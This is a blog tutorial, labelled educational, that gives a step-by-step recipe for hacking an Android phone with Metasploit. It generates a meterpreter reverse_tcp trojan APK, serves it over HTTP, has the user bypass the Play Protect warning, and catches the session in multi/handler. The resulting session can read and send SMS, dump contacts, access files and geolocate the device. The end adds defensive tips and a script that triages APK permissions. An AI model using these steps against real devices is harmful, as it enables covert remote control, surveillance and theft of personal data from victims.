Ethical Hacking 101 - How Can You Hack Into An Android Device 📱 In 2022?

Raghav Mrituanjaya


We will see how you can hack into your own Android phone in 2022 using the Metasploit Framework. The attack uses a Trojan APK generated with Metasploit.

Disclaimer: This post is only meant to illustrate these attacks and is purely for educational purposes.

What is Metasploit 🤔?

Metasploit is an open-source computer security project maintained and developed by Rapid7. It provides a set of tools that help an organization's security analysts find bugs in their systems and recommend ways to fix them. It comes pre-installed in Kali Linux. It contains over 590 modules; some of the important ones are listed below.

  • Command shell: lets users run collection scripts or arbitrary commands against the host.
  • Meterpreter (the Metasploit Interpreter): lets users control a device's screen over VNC and browse, upload and download files.
  • Dynamic payloads: let users evade anti-virus defences by generating unique payloads.
  • Static payloads: provide static IP address/port forwarding for communication between the host and the client system.

Installing Metasploit

  • Run the following commands to install Metasploit on your Linux server:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
  • Metasploit is also available for other operating systems; see the official installation documentation for details.
  • If you are looking for a cloud server to test Metasploit, consider Vultr.

Playing with Metasploit 😉

  • To find the public IP of our instance (a VM in the cloud), run wget -qO - ipinfo.io, which returns output similar to this 👇
{
  "ip": "11.22.33.444",
  "hostname": "8.9.8.1.bc.googleusercontent.com",
  "city": "Singapore",
  "region": "Singapore",
  "country": "SG",
  "loc": "1.2897,103.8501",
  "org": "AS396982 Google LLC",
  "postal": "018989",
  "timezone": "Asia/Singapore",
  "readme": "https://ipinfo.io/missingauth"
}
  • The ip field in the JSON is the public IP of your instance.
  • If you are running on your local network, find the internal IP of your instance with ifconfig instead.
  • Before going further we have to create the Trojan APK, which is done with the command below:
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.106.0.2 LPORT=4444 R> /var/www/html/payload.apk
  • The -p argument selects the payload to use; here it is android/meterpreter/reverse_tcp.
  • LHOST is the host that will receive the connection from the victim device. Change this value to the public or internal IP of your instance.
  • LPORT is the port on which that connection is received. You can change this value or keep the default, 4444.
  • R selects raw output, and > redirects it into the file at the given path, with the given extension.
(Image: msfvenom output)
  • Now change to the directory where the payload was generated (in my case cd /var/www/html) and run python -m SimpleHTTPServer 1234 to spin up a temporary web server on port 1234. SimpleHTTPServer is the Python 2 module; on Python 3 the equivalent is python3 -m http.server 1234.
  • You can then download the APK onto your phone by visiting http://private_or_public_ip:1234/filename.apk
  • Once you have downloaded the APK and try to install it, you will likely see a window like the one below, where you have to choose the Install anyway option:
(Image: Blocked By Play Protect)
  • Now head over to the instance's terminal, open Metasploit by running msfconsole, and run the following commands:
use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 1.1.1.1
set LPORT 4444
exploit
  • Change the values of LHOST and LPORT to the ones you configured earlier.
  • Now open the application you installed. Its name should be Main Activity.
  • After you open the app, return to the terminal: a new session should have opened, in which you have full control of the device.
(Image: Core Commands)
  • It also includes functions for interacting with the device's filesystem.
  • There are also functions to read or send SMS messages and to dump all the contacts.
  • To list all available commands, run ? or help.
  • Let's see how to locate the user's current position by running a single command: geolocate.

Tips to stay away from a Trojan attack ⚔

  • Do not download APKs from untrusted sources.
  • In this post I've only shown how to create a Trojan APK, but real hackers might merge the Trojan with a legitimate app and ask us to download the APK. If you would like to know how a Trojan can be merged into another APK file, do let me know in the comment section below.
  • Examine the code before you install any open-source application.
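One practical way to follow the last tip before an APK goes anywhere near a phone is to check what it asks for. The Python script below is an added example written for this post; it is not the author's code and not part of Metasploit. It reads the binary AndroidManifest.xml out of an APK, walks the string pool of Android's binary XML (AXML) format (a file header followed by a string-pool chunk whose strings are UTF-16 by default or UTF-8 when the 0x100 flag is set), lists every android.permission.* string it finds, and flags the permissions that correspond to the capabilities shown above (SMS, contacts, location, microphone, camera). The sample APK it builds in memory is a constructed fixture: the package name and permission list in it are made up for the demonstration, and build_axml only exists to produce that fixture.

```python
import io
import struct
import zipfile

RES_XML_TYPE = 0x0003          # chunk type of a binary XML file header
RES_STRING_POOL_TYPE = 0x0001  # chunk type of the string pool that follows it
UTF8_FLAG = 0x0100             # string pool flag: strings are UTF-8, not UTF-16

# Permissions matching what a Meterpreter session offers: SMS, contacts, geolocate, audio/video.
HIGH_RISK = {
    "android.permission.READ_SMS",
    "android.permission.SEND_SMS",
    "android.permission.READ_CONTACTS",
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.RECORD_AUDIO",
    "android.permission.CAMERA",
}


def _len16(buf, off):
    """UTF-16 pool: one uint16 length, or two when the high bit is set."""
    n = struct.unpack_from("<H", buf, off)[0]
    if n & 0x8000:
        return ((n & 0x7FFF) << 16) | struct.unpack_from("<H", buf, off + 2)[0], off + 4
    return n, off + 2


def _len8(buf, off):
    """UTF-8 pool: one byte length, or two when the high bit is set."""
    n = buf[off]
    if n & 0x80:
        return ((n & 0x7F) << 8) | buf[off + 1], off + 2
    return n, off + 1


def axml_strings(axml):
    """Return the string pool of a binary AndroidManifest.xml as a list of str."""
    if len(axml) < 8 or struct.unpack_from("<H", axml, 0)[0] != RES_XML_TYPE:
        raise ValueError("not an Android binary XML file")
    pool = struct.unpack_from("<H", axml, 2)[0]  # file header size = pool chunk offset
    (ctype, hdr_size, _chunk_size, count, _styles, flags,
     strings_start, _styles_start) = struct.unpack_from("<HHIIIIII", axml, pool)
    if ctype != RES_STRING_POOL_TYPE:
        raise ValueError("string pool chunk not found")
    offsets = struct.unpack_from("<%dI" % count, axml, pool + hdr_size)
    base = pool + strings_start  # string offsets are relative to stringsStart
    out = []
    for rel in offsets:
        off = base + rel
        if flags & UTF8_FLAG:
            _chars, off = _len8(axml, off)   # character count (not needed here)
            nbytes, off = _len8(axml, off)   # encoded byte count
            out.append(axml[off:off + nbytes].decode("utf-8", "replace"))
        else:
            nchars, off = _len16(axml, off)
            out.append(axml[off:off + 2 * nchars].decode("utf-16-le", "replace"))
    return out


def apk_permissions(apk):
    """List every android.permission.* string declared in an APK's manifest."""
    with zipfile.ZipFile(apk) as z:
        manifest = z.read("AndroidManifest.xml")
    return [s for s in axml_strings(manifest) if s.startswith("android.permission.")]


def triage(perms):
    """Return the requested permissions that are on the high-risk list, sorted."""
    return sorted(set(perms) & HIGH_RISK)


def build_axml(strings, utf8=False):
    """Constructed fixture: a minimal binary XML file holding only a string pool."""
    data, offsets = bytearray(), []
    for s in strings:  # fixture strings stay under 128 chars, so one length byte suffices
        offsets.append(len(data))
        if utf8:
            enc = s.encode("utf-8")
            data += bytes([len(s), len(enc)]) + enc + b"\x00"
        else:
            data += struct.pack("<H", len(s)) + s.encode("utf-16-le") + b"\x00\x00"
    hdr = 28
    strings_start = hdr + 4 * len(strings)
    pool = struct.pack("<HHIIIIII", RES_STRING_POOL_TYPE, hdr, strings_start + len(data),
                       len(strings), 0, UTF8_FLAG if utf8 else 0, strings_start, 0)
    pool += struct.pack("<%dI" % len(strings), *offsets) + bytes(data)
    return struct.pack("<HHI", RES_XML_TYPE, 8, 8 + len(pool)) + pool


SAMPLE_STRINGS = [  # constructed manifest string pool; not taken from any real app
    "manifest", "uses-permission", "com.example.constructed.sample",
    "android.permission.INTERNET", "android.permission.READ_SMS",
    "android.permission.ACCESS_FINE_LOCATION", "android.permission.READ_CONTACTS",
]


def make_sample_apk(utf8=False):
    """Constructed in-memory APK whose manifest carries SAMPLE_STRINGS."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", build_axml(SAMPLE_STRINGS, utf8))
    buf.seek(0)
    return buf


if __name__ == "__main__":
    perms = apk_permissions(make_sample_apk())
    print("requested:", perms, "\nhigh risk:", triage(perms))
```

To run it against a real file, call apk_permissions("/path/to/downloaded.apk") (the path is a placeholder). The script is a triage aid, not a verdict: a benign messaging app legitimately asks for SMS permissions, and an app can only use what it declares, so an unexpected entry in the high-risk list is the cue to read the code or not install at all.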

P.S.: Vultr (get a $100 credit by registering using this link) is a good hosting choice if you're looking for one.

Thanks for reading till the end. Do let me know if you have any queries in the comment section below 😀

© 2024 THE GOGAMIC BLOG